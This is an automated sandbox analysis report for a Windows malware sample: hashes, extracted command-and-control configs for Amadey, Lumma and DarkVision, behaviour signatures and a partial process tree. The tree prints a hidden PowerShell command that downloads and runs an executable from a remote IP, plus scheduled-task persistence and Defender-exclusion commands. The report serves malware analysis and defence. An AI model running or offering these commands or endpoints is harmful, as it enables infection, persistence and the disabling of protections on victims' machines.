Analysis
-
max time kernel
83s -
max time network
94s -
platform
windows11-21h2_x64 -
resource
win11-20250313-en -
resource tags
arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system -
submitted
06/04/2025, 15:38
Static task
static1
Behavioral task
behavioral1
Sample
2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource
win11-20250313-en
Errors
General
-
Target
2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
ebbfde535259121763840a367a9c1a92
-
SHA1
df427a54057634b350520cc472faf3813f59925e
-
SHA256
a40db67ec008dbdbf87fd6c304948096b6bf9f2fa07b6ea9d5e71b59bfdde574
-
SHA512
60676876c53cdea75c8b6b0ca67308599c30b91fccfa363802659b02e1acb1ba89c94f762ccc9ea1365bd800a81bf5fc5bdafc2a87442f27c1cff1681319d7f0
-
SSDEEP
24576:eqDEvCTbMWu7rQYlBQcBiT6rprG8a4Ku:eTvC/MTQYxsWR7a4K
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://cosmosyf.top/GOsznj
https://yjrxsafer.top/shpaoz
https://krxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://rodformi.run/aUosoz
https://metalsyo.digital/opsa
https://ironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://wstarcloc.bet/GOksAo
https://atargett.top/dsANGt
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://starcloc.bet/GOksAo
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Lumma family
-
Contacts a large (3881) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ed53248cd5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f9f2ed07b5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ but2.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d565737ffd.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 1 3944 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 3944 powershell.exe 2064 powershell.exe 14088 powershell.exe -
Downloads MZ/PE file 9 IoCs
flow pid Process 46 948 rapes.exe 46 948 rapes.exe 46 948 rapes.exe 922 948 rapes.exe 1 3944 powershell.exe 86 948 rapes.exe 4 948 rapes.exe 4 948 rapes.exe 9 6072 svchost.exe -
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\Drivers\a7357598.sys 1ae0e7e6.exe File created C:\Windows\System32\Drivers\klupd_a7357598a_arkmon.sys 1ae0e7e6.exe -
Sets service image path in registry 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\620db8a_6136\ImagePath = "\\??\\C:\\Windows\\Temp\\j6WKaLP_6136.sys" tzutil.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\a7357598\ImagePath = "System32\\Drivers\\a7357598.sys" 1ae0e7e6.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\klupd_a7357598a_arkmon\ImagePath = "System32\\Drivers\\klupd_a7357598a_arkmon.sys" 1ae0e7e6.exe -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ed53248cd5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f9f2ed07b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d565737ffd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ed53248cd5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f9f2ed07b5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion but2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d565737ffd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Deletes itself 1 IoCs
pid Process 2560 w32tm.exe -
Executes dropped EXE 17 IoCs
pid Process 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 948 rapes.exe 1224 b12f18ca4c.exe 3604 UZPt0hR.exe 3716 d565737ffd.exe 6136 tzutil.exe 2560 w32tm.exe 5732 Rm3cVPI.exe 6944 rapes.exe 5696 ed53248cd5.exe 7264 f9f2ed07b5.exe 7932 9sWdA2p.exe 1580 but2.exe 8640 pcidrv.exe 9760 2aa71ad5.exe 11108 1ae0e7e6.exe 12752 larBxd7.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine d565737ffd.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine ed53248cd5.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine f9f2ed07b5.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine but2.exe Key opened \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Wine TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE -
Impair Defenses: Safe Mode Boot 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\a7357598.sys 1ae0e7e6.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\a7357598.sys\ = "Driver" 1ae0e7e6.exe -
Loads dropped DLL 19 IoCs
pid Process 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe 11108 1ae0e7e6.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\72e64bd5-73dc-4069-b5d3-7d222f717511 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\{cf560e92-3003-4642-8523-e7b4365f6cea}\\72e64bd5-73dc-4069-b5d3-7d222f717511.cmd\"" 1ae0e7e6.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000\Software\Microsoft\Windows\CurrentVersion\Run\{57F06FF0-B2D5-45F3-BFEE-970F76E38EFD} = "C:\\ProgramData\\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 ed53248cd5.exe File opened for modification \??\PhysicalDrive0 1ae0e7e6.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 8736 tasklist.exe 12036 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 948 rapes.exe 3716 d565737ffd.exe 6944 rapes.exe 5696 ed53248cd5.exe 7264 f9f2ed07b5.exe 1580 but2.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1224 set thread context of 2128 1224 b12f18ca4c.exe 93 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN 2aa71ad5.exe File opened (read-only) \??\VBoxMiniRdrDN 1ae0e7e6.exe -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\ModularVol larBxd7.exe File opened for modification C:\Windows\LowerOrgasm larBxd7.exe File created C:\Windows\Tasks\rapes.job TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE File opened for modification C:\Windows\GovernmentalOttawa larBxd7.exe File opened for modification C:\Windows\AmongDouble larBxd7.exe File opened for modification C:\Windows\GentleOklahoma larBxd7.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 26 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language UZPt0hR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language but2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pcidrv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2aa71ad5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Rm3cVPI.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f9f2ed07b5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language larBxd7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d565737ffd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 9sWdA2p.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ae0e7e6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed53248cd5.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 8876 timeout.exe -
Modifies registry class 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" BackgroundTransferHost.exe Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache MiniSearchHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix BackgroundTransferHost.exe Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" BackgroundTransferHost.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3888 schtasks.exe 8416 schtasks.exe 2120 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 3944 powershell.exe 3944 powershell.exe 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 948 rapes.exe 948 rapes.exe 2128 MSBuild.exe 2128 MSBuild.exe 2128 MSBuild.exe 2128 MSBuild.exe 2064 powershell.exe 2064 powershell.exe 3716 d565737ffd.exe 3716 d565737ffd.exe 14088 powershell.exe 14088 powershell.exe 3716 d565737ffd.exe 3716 d565737ffd.exe 3716 d565737ffd.exe 3716 d565737ffd.exe 6420 powershell.exe 6420 powershell.exe 6944 rapes.exe 6944 rapes.exe 5696 ed53248cd5.exe 5696 ed53248cd5.exe 5732 Rm3cVPI.exe 5732 Rm3cVPI.exe 5732 Rm3cVPI.exe 5732 Rm3cVPI.exe 7264 f9f2ed07b5.exe 7264 f9f2ed07b5.exe 7264 f9f2ed07b5.exe 7264 f9f2ed07b5.exe 7264 f9f2ed07b5.exe 7264 f9f2ed07b5.exe 7932 9sWdA2p.exe 7932 9sWdA2p.exe 7932 9sWdA2p.exe 7932 9sWdA2p.exe 7932 9sWdA2p.exe 7932 9sWdA2p.exe 1580 but2.exe 1580 but2.exe -
Suspicious behavior: LoadsDriver 2 IoCs
pid Process 6136 tzutil.exe 11108 1ae0e7e6.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 3604 UZPt0hR.exe 3604 UZPt0hR.exe 3604 UZPt0hR.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
description pid Process Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 2064 powershell.exe Token: SeDebugPrivilege 14088 powershell.exe Token: SeLoadDriverPrivilege 6136 tzutil.exe Token: SeDebugPrivilege 6420 powershell.exe Token: SeDebugPrivilege 11108 1ae0e7e6.exe Token: SeBackupPrivilege 11108 1ae0e7e6.exe Token: SeRestorePrivilege 11108 1ae0e7e6.exe Token: SeLoadDriverPrivilege 11108 1ae0e7e6.exe Token: SeShutdownPrivilege 11108 1ae0e7e6.exe Token: SeSystemEnvironmentPrivilege 11108 1ae0e7e6.exe Token: SeSecurityPrivilege 11108 1ae0e7e6.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1708 MiniSearchHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1496 wrote to memory of 4736 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 82 PID 1496 wrote to memory of 4736 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 82 PID 1496 wrote to memory of 4736 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 82 PID 1496 wrote to memory of 6024 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 83 PID 1496 wrote to memory of 6024 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 83 PID 1496 wrote to memory of 6024 1496 2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 83 PID 4736 wrote to memory of 3888 4736 cmd.exe 85 PID 4736 wrote to memory of 3888 4736 cmd.exe 85 PID 4736 wrote to memory of 3888 4736 cmd.exe 85 PID 6024 wrote to memory of 3944 6024 mshta.exe 86 PID 6024 wrote to memory of 3944 6024 mshta.exe 86 PID 6024 wrote to memory of 3944 6024 mshta.exe 86 PID 3944 wrote to memory of 2380 3944 powershell.exe 89 PID 3944 wrote to memory of 2380 3944 powershell.exe 89 PID 3944 wrote to memory of 2380 3944 powershell.exe 89 PID 2380 wrote to memory of 948 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 90 PID 2380 wrote to memory of 948 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 90 PID 2380 wrote to memory of 948 2380 TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE 90 PID 948 wrote to memory of 1224 948 rapes.exe 91 PID 948 wrote to memory of 1224 948 rapes.exe 91 PID 1224 wrote to memory of 2688 1224 b12f18ca4c.exe 92 PID 1224 wrote to memory of 2688 1224 b12f18ca4c.exe 92 PID 1224 wrote to memory of 2688 1224 b12f18ca4c.exe 92 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 1224 wrote to memory of 2128 1224 b12f18ca4c.exe 93 PID 948 wrote to memory of 3604 948 rapes.exe 95 PID 948 wrote to memory of 3604 948 rapes.exe 95 PID 948 wrote to memory of 3604 948 rapes.exe 95 PID 3604 wrote to memory of 5200 3604 UZPt0hR.exe 96 PID 3604 wrote to memory of 5200 3604 UZPt0hR.exe 96 PID 3604 wrote to memory of 6072 3604 UZPt0hR.exe 98 PID 3604 wrote to memory of 6072 3604 UZPt0hR.exe 98 PID 5200 wrote to memory of 2064 5200 cmd.exe 99 PID 5200 wrote to memory of 2064 5200 cmd.exe 99 PID 948 wrote to memory of 3716 948 rapes.exe 104 PID 948 wrote to memory of 3716 948 rapes.exe 104 PID 948 wrote to memory of 3716 948 rapes.exe 104 PID 6072 wrote to memory of 6136 6072 svchost.exe 105 PID 6072 wrote to memory of 6136 6072 svchost.exe 105 PID 6072 wrote to memory of 2560 6072 svchost.exe 106 PID 6072 wrote to memory of 2560 6072 svchost.exe 106 PID 6136 wrote to memory of 14088 6136 tzutil.exe 107 PID 6136 wrote to memory of 14088 6136 tzutil.exe 107 PID 948 wrote to memory of 5732 948 rapes.exe 109 PID 948 wrote to memory of 5732 948 rapes.exe 109 PID 948 wrote to memory of 5732 948 rapes.exe 109 PID 6136 wrote to memory of 6420 6136 tzutil.exe 110 PID 6136 wrote to memory of 6420 6136 tzutil.exe 110 PID 948 wrote to memory of 5696 948 rapes.exe 114 PID 948 wrote to memory of 5696 948 rapes.exe 114 PID 948 wrote to memory of 5696 948 rapes.exe 114 PID 948 wrote to memory of 7264 948 rapes.exe 115 PID 948 wrote to memory of 7264 948 rapes.exe 115 PID 948 wrote to memory of 7264 948 rapes.exe 115 PID 948 wrote to memory of 7932 948 rapes.exe 117 PID 948 wrote to memory of 7932 948 rapes.exe 117 PID 948 wrote to memory of 7932 948 rapes.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-06_ebbfde535259121763840a367a9c1a92_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 48ecGmaFiD8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\s1w780Akm.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 48ecGmaFiD8 /tr "mshta C:\Users\Admin\AppData\Local\Temp\s1w780Akm.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3888
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\s1w780Akm.hta2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6024 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'STRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Users\Admin\AppData\Local\TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE"C:\Users\Admin\AppData\Local\TempSTRJ8DNXOQPUYR5PLMNYE1AZBMLFT0DP.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:948 -
C:\Users\Admin\AppData\Local\Temp\10003000101\b12f18ca4c.exe"C:\Users\Admin\AppData\Local\Temp\10003000101\b12f18ca4c.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1224 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2688
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2128
-
-
-
C:\Users\Admin\AppData\Local\Temp\10337510101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10337510101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵
- Suspicious use of WriteProcessMemory
PID:5200 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:6072 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:6136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath C:\9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:14088
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6420
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:2560 -
